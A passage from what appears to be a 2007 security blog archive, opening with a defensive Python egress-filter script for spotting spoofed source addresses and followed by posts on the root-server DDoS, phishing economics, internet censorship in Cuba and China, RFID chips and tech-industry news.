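    ("192.0.2.200", "192.0.2.10", 53, 9000),       # not this ISP's address space
]


def classify_source(src, allocated=ALLOCATED, bogons=BOGONS):
    """Return "ok", "bogon" or "spoofed" for the source of a packet leaving the network."""
    addr = ipaddress.ip_address(src)
    if any(addr in net for net in bogons):
        return "bogon"
    if any(addr in net for net in allocated):
        return "ok"
    return "spoofed"


def egress_filter(flows, allocated=ALLOCATED, bogons=BOGONS):
    """Split flows into (forwarded, dropped); each dropped record carries its verdict."""
    forwarded, dropped = [], []
    for src, dst, port, pkts in flows:
        verdict = classify_source(src, allocated, bogons)
        if verdict == "ok":
            forwarded.append((src, dst, port, pkts))
        else:
            dropped.append((src, dst, port, pkts, verdict))
    return forwarded, dropped


def spoofed_packet_share(flows, allocated=ALLOCATED, bogons=BOGONS):
    """Fraction of outbound packets carrying a source the ISP cannot vouch for.

    This is the share a victim's flow data would wrongly attribute to whoever
    owns the forged addresses, which is why per-country percentages in attack
    reports are only as good as the egress filtering of the sending networks."""
    forwarded, dropped = egress_filter(flows, allocated, bogons)
    total = sum(f[3] for f in forwarded) + sum(d[3] for d in dropped)
    return sum(d[3] for d in dropped) / total if total else 0.0


if __name__ == "__main__":
    kept, cut = egress_filter(SAMPLE_FLOWS)
    for rec in cut:
        print("drop", rec[0], "->", rec[1], "reason:", rec[4])
    print("share of packets that would have left with a forged source: "
          f"{spoofed_packet_share(SAMPLE_FLOWS):.1%}")
```

Note what the filter does not do: the 90000-packet flow from 203.0.113.77 is a genuine customer and passes, so source validation stops an ISP's users from hiding behind other people's addresses but does not stop a botnet; it only makes the resulting attribution, such as the 61% figure above, trustworthy.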

A battle lost for the botnet masters in their futile attempt to shut down three of the root servers, and a battle won for South Korea, as they will definitely take this wake-up call seriously. Meanwhile, S. Korea's CERT offers lots of interesting research reports on the local situation, particularly their latest Internet Incident Trend Report.

Graph courtesy of the ANA Spoofer Project.

The Phishing Ecosystem

February 21, 2007
Phishing is the efficient form of online social engineering. With the ease of sending phishing emails thanks to malware infected PCs -- spamonomics 101 -- as well as the many other techniques for creating the pages and forwarders phishers use to trick users, it's indisputable how much more profitable phishing is compared to spam.

This is perhaps the most detailed summary of the emerging ecosystem I've read in a while. It walks the reader through the process of acquiring the resources for the attack and tracking down the results, and provides an overview of how malware authors, phishers and spammers work hand in hand due to the pressure put on their actions by the industry and, of course, the countless third-party researchers. Here's a summary :

"- Get an email list
- Develop the attack
- Locate sites to send phishing emails from
- Locate sites to host the phishing site
- Launch the attack
- Collect results"

Around the industry, security researchers are again signalling the ongoing use of popular sites such as MySpace for hosting phishing pages, phishers are going Web 2.0 and starting to use Google Maps, and it seems CastleCops, the anti-phishing community, witnessed a demonstration of DDoS bandwidth power, which is definitely the result of the consolidated anti-phishing initiative they manage to keep on expanding. Moreover, yet more evidence of the developing ecosystem is the fact that spam and defaced sites aren't what they used to be, namely they are turning into malicious attack vectors. Despite everyone's claims about the commercialization of this entire ecosystem, hacktivism is not dead!

The "best" is yet to come; let's hope for a more suspicious common sense on the users' part too.

Cuba's Internet Dictatorship

February 19, 2007
And you thought people in China suffer from a lack of free expression. Here's the cheap version of the Great Firewall of China, this time in Cuba :

"Cuba built an Internet search engine that allows users to trawl through speeches by Cuban leader Fidel Castro and other government sites, but does not browse Web pages outside the island. Cubans cannot buy computers and Internet access is limited to state employees, academics and foreigners. Cubans line up for hours to send e-mails on post office terminals that cannot surf the World Wide Web. Passwords are sold on the black market allowing shared Internet use for limited hours, usually at night."

With Fidel Castro now seriously ill, the speeches will sooner or later turn into historical ones; the question is which think-tank across the world will come closest to reality in its predictions of the situation in a post-Castro Cuba. On the other hand the U.S. is starving Cuba's bandwidth hunger to death, and considering their inability to invest in alternative sources of connectivity, the extent of the degradation of their Internet connectivity is almost unbelievable :

"Cuba is forced to use a costly satellite channel with only 65 megabytes per second (mbps) for upload and 124 mbps for download, he said."

Even a France Telecom customer that has upgraded to Fiber@Home would be able to ping-to-death Cuba's entire academic community. And while Cuba recently blamed the CIA for digital espionage, it would take an unnecessarily long time to download sensitive material remotely given Cuba's bandwidth capacity. Several other interesting events, in case you remember, were when Kyrgyzstan got cut off from the Internet by a hacker attack, and when Zimbabwe's Internet was shut down because they forgot to pay their bill. Bandwidth matters, depending on the perspective of course.

The most recent report on Censorship in Cuba is also worth going through :

"To visit websites or check their e-mail, Cubans have to use public access points such as Internet cafes, universities and “Youth computing centers” where it is easier to monitor their activity. Then, the Cuban police has installed software on all computers in Internet cafes and big hotels that triggers an alert message when “subversive” key-words are noticed."

The only way to undermine censorship is to talk about it -- and mock it.

Profiling Sergey Brin

February 18, 2007
Great weekend reading :

"Stepping through the sliding glass door into their office is like walking into a playroom for tech-savvy adults. A row of sleek flat-screen monitors lining one wall displays critical information: email, calendars, documents and, naturally, the Google search engine. Assorted green plants and an air purifier keep the oxygen flowing, while medicine balls provide appropriately kinetic seating. Upstairs, a private mezzanine with Astroturf carpeting and an electric massage chair afford Sergey and Larry a comfortable perch from which to entertain visitors and survey the carnival of innovation going on below. And there is ample space for walking around, which is absolutely essential for Sergey, who just can’t seem to sit still."

A story that proves yet again that nothing's impossible, the impossible just takes a little while. Here are some photos from Google's NYC headquarters; guess who likes to spoil its employees -- sorry, Googlers -- most of all the tech companies these days? Say Google again!

Beyond Traditional Advertising Packages

February 18, 2007
Differentiate your value proposition or cease to exist. And hey, that's on Madison Avenue :

"As a startup carrier that hadn't yet hired a pilot, Virgin needed more than just slogans and 30-second commercials. That's about when Anomaly, a two-year-old startup, brought a pitch that sounded more like a takeover bid: Carl Johnson, Anomaly's 48-year-old co-founder, hauled out plans to design the interiors of Virgin's new A320s, fashion the flight attendants' uniforms, and create the content for a pay-per-view seat-back entertainment system."

You may also find the best and worst Super Bowl ads -- the U.S. ad industry's favorite playground -- entertaining. Meanwhile, Pepsi is anticipating the DIY marketing culture and is asking everyone to help build its next billboard on Times Square. When advertising does its job, millions of people keep theirs, doesn't it?

My Feed is on Fire, My Feed is on Fire!

February 18, 2007
I've never had so many people connected to me; perhaps it's the consequence of FeedBurner detecting Google Reader subscribers as of this week, and yes, the quality of the posts themselves. Here's an interesting opinion on the frequency of blog posting; I especially like the author's understanding of readers' loyalty towards a blog. My ROI is still positive regardless -- part two of Forrester's series is also worth the read.

Delicious Information Warfare - Friday 16th

February 16, 2007
Here are some articles and blog posts worth reading plus the related comments. Previous summaries as well.

Islamic Terrorism from Clearguidance.com to Islamicnetwork.com -- very interesting reading regarding Daniel Joseph Maldonado, and a visionary quote: "It takes a community to make a terrorist and it only takes a handful of people to build and maintain such communities."

Former DuPont senior scientist pleads to corporate espionage -- fresh case of corporate espionage. As always, I find it a totally biased opinion, with companies falling in love with their trade secrets, even coming up with numbers as high as $400M

Information warfare, psyops, and the power of myth -- decent article on the topics in today's world of war on ideologies

Glitches plague NSA's effort to track terrorists online -- Tracking terrorists online courtesy of the NSA's Turbulence program is another $500M failure to understand the dynamics of cyberterrorism. Thankfully, there are third-party organizations the NSA is definitely listening to and obtaining its intelligence from, given the lack of ethnic diversity in the U.S. intelligence community, one that is crucial nowadays. The cutest quote of the day: "Inside the agency, Turbulence's sensitive activities are sequestered behind passwords known to few."

Panda Software Releases Malware Radar, the First Automated Malware Audit Service -- not necessarily the first, as pretty much all vendors offer online malware scans, but it's a product line extension based on Panda's recent licensing deals with other vendors

Hackers target the home front -- great example of targeted email attacks; makes you wonder two things: what's the chance the attacks aren't really systematic but basically regular malware infection attempts, and whether the emails of top management, or of anyone @bank.com, have been available to attackers wanting to take advantage of the insecurity of their home PCs

Turkish hacker strikes Down Under -- why shared hosting isn't serious from a security point of view

'Storm' Worm Touches Down on IM -- the Storm Worm malware switching vectors; interesting, but a fact demonstrating the inexperience of the malware author, since an experienced one would have built the feature into the very first releases instead of relying on mass mailings only

Top 10 Disrupters of 2006 -- catchy slide show and here's the full story

Russia's Ivanov slams U.S. missile shield plans in Europe -- the proposed U.S missile shield in Eastern Europe would give Russia the excuse to do something naughty like this

Cyber officials: Chinese hackers attack 'anything and everything' -- Chinese script kiddies generating noise so that the advanced, government-backed espionage attempts remain buried in the noise - predictable pattern

Cuban Information Minister Blasts US Digital Espionage -- Cuba to the U.S.: stop using OSINT and data aggregation techniques against us; as you can see, we don't know how to Google

The Next Big Ad Medium: Podcasts -- unless measurability improves it's all shooting in the dark for advertisers, and an ad budget allocation dream come true for publishers

How to Stalk Your Family -- start by self-regulation, everyone?

Text of Email to all Yahoos -- Yahoo's CFO to all Yahoos, now if an average Yahoo is able to understand the corporate talk I'll bring the beer

Google Agrees to Buy Adscape -- Google's getting into the emerging in-game advertising market. Would a gaming company find that the lack of ads in its game can turn into a competitive advantage in the long-term?

Yahoo co-founder Jerry Yang to donate $75 million to Stanford -- never forget who you are and where you came from. Jerry Yang is donating $75M to Stanford University which as a matter of fact is largely financed by ex-disruptors, and yes tuition fees. They even hold quite some Google shares


Terrorism and Encryption

February 16, 2007
Jihadist themed encryption tool -- using "infidel" algorithms :

"'The program's 'portability' as an application (not requiring installation on a personal computer) will become an increasingly desirable feature, especially considering the high use of Internet cafes worldwide by pro-terrorist Islamic extremists,' said iDefense Middle East analyst Andretta Summerville. 'Mujahedin Secrets,' which can be downloaded for free, offers 'the five best encryption algorithms, with symmetrical encryption keys (256 bit), asymmetrical encryption keys (2048 bit) and data compression,' according to a translation of a Global Islamic Media Front's announcement about the software on Jan. 1, provided by the Middle East Media Research Institute."

I've previously covered the topic of steganography and terrorism in depth, and provided an example while assessing the threat -- and hype -- level of the Technical Mujahid. Terrorists have this problem with the infidels: pretty much everything they use, starting from the Internet and their cellphones, even the software running on their computers, is "Made in InfidelLand". So I presume someone's not really comfortable with encrypting their data even with U.S. made PGP software, so re-branding and adding a Jihadist theme seems to be the solution, at least where PSYOPS count. The advertised key sizes -- 256-bit symmetric, 2048-bit asymmetric -- are exactly what off-the-shelf tools like PGP already offer, so the theme is the only thing that's new. More info on the topic.

The Electronic Frontier Foundation in Europe

February 15, 2007
Couldn't get any better :

"The Electronic Frontier Foundation (EFF) opened a new office in Brussels today to work with various institutions of the European Union (EU) on innovation and digital rights, acting as a watchdog for the public interest in intellectual property and civil liberties policy initiatives that impact the European digital environment. The new EFF Europe office, made possible by the generous support of the Open Society Institute and Mr. Mark Shuttleworth of the Shuttleworth Foundation, will allow EFF to have an increased focus on the development of EU law. EFF also plans to expand its efforts in European digital activism and looks forward to working with many groups and organizations to fight effectively for consumers' and technologists' interests."

Finally EDRi got some serious back-up on the frontlines.

RFID Tracking Miniaturization

February 15, 2007
First it was RFID tracking ink; now, with the introduction of the new generation of Hitachi mu-chips, miniaturization proves yet again that it has huge privacy implications :

"On February 13, Hitachi unveiled a tiny, new “powder” type RFID chip measuring 0.05 x 0.05 mm — the smallest yet — which they aim to begin marketing in 2 to 3 years. By relying on semiconductor miniaturization technology and using electron beams to write data on the chip substrates, Hitachi was able to create RFID chips 64 times smaller than their currently available 0.4 x 0.4 mm mu-chips. Like mu-chips, which have been used as an anti-counterfeit measure in admission tickets, the new chips have a 128-bit ROM for storing a unique 38-digit ID number."

I will spare you the acronym, as I'm sure you know which intelligence agency is sitting on the world's largest budget, but just a wake-up call that all technologies that are only now getting commercialized, or getting a first mention in the mainstream media, have already been developed, even abandoned for more advanced alternatives, by this agency years ago -- despite the fact that Hitachi is a Japanese company, it's a U.S. agency I'm talking about. OSI are definitely remembering the old school days now. Picture courtesy of Hitachi, comparing the chip's size next to a grain of rice.

UPDATE: Slashdot picked up the story.

Censorship in China - An Open Letter

February 14, 2007
An open letter to Google's Founders regarding the censorship of search results in China :

"During the National Day holiday week in 2002, when Google.com was blocked in China for the first time, Chinese Google users made an online protest spontaneously. They appealed to free the purer search engine wave by wave. It seemed it's also the first time grassroots power was demonstrated in China on the Internet. You can imagine how eager they are to have a complete Internet instead of a shrunken one. At last, people won, Google backed. However, after 4 years, we started to question whether we should continue to support Google. Many users here were disappointed when they found Google.cn filtered many keywords. The compromise remarks by you in Davos made us more frustrated. Seems you are adopting self-censorship which hurts those loyal users a lot, which also devalues your motto of "non-evil"."

Issues to keep in mind:
- Yahoo and Microsoft are doing it too in order to continue their business operations in China
- Google is alerting the searcher that the results are filtered because the ghost of Mao is alive and kicking and said so
- Google's losing market share in China's search market next to Sina.com due to censorship concerns, while local users are forgetting that Sina.com too is censoring the results, even worse, not even crawling as deep as Google is in respect to the quality of search results
- U.S Congressman Chris Smith has the issue on his agenda
- Technology companies are seeking government assistance on how to stop the ongoing censorship themselves
- The complete list of censored search results is worth going through
- Google's and Yahoo's shareholders are fighting back
- The Great Firewall is cracking from within with banned journalists now running the largest blogging network in China